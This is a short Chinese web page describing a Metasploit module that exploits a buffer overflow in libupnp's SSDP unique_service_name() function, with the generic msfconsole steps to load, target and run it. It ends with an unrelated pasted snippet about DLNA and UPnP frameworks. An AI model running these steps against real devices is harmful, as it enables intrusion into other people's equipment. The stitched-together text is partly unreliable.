upnp漏洞
钱承允
原理
该模块利用libupnp的SSDP处理器的unique_service_name()函数中的缓冲区溢出。libupnp库可用于数千种设备,被称为UPnP设备的英特尔SDK或UPnP设备的便携式SDK。由于许多设备的大小限制,此漏洞利用单独的TCP侦听器暂存实际有效负载。
模块选项
要显示可用选项,请在Metasploit控制台中加载模块,然后运行命令“显示选项”或“显示高级”:
利用
msf > use exploit/multi/upnp/libupnp_ssdp_overflow
msf exploit(libupnp_ssdp_overflow) > show targets
...targets...
msf exploit(libupnp_ssdp_overflow) > set TARGET < target-id >
msf exploit(libupnp_ssdp_overflow) > show options
...show and set options...
msf exploit(libupnp_ssdp_overflow) > exploit
https://www.rapid7.com/db/modules/exploit/multi/upnp/libupnp_ssdp_overflow/
继之前一个人研究ONVIF协议,SSDP协议,现在又要跳DLNA的坑,说到DLNA,必须离不开UPNP,这俩关系特好. DLNA官网:http://www.dlna.org/. UPNP官网:http://www.upnp.org. UPNP 也是个很强大的组织,有兴趣的可以深究. DLNA采用UPNP协议进行设备控制,前段时间为了实现设备的发现功能,研究Upnp 1.0,有两个比较知名的框架. libupnp,miniupnp,
https://www.cnblogs.com/cmt/p/14580194.html?from=https%3A%2F%2Fwww.cnblogs.com%2Fgeeker%2Fp%2F4466977.html
类似资料: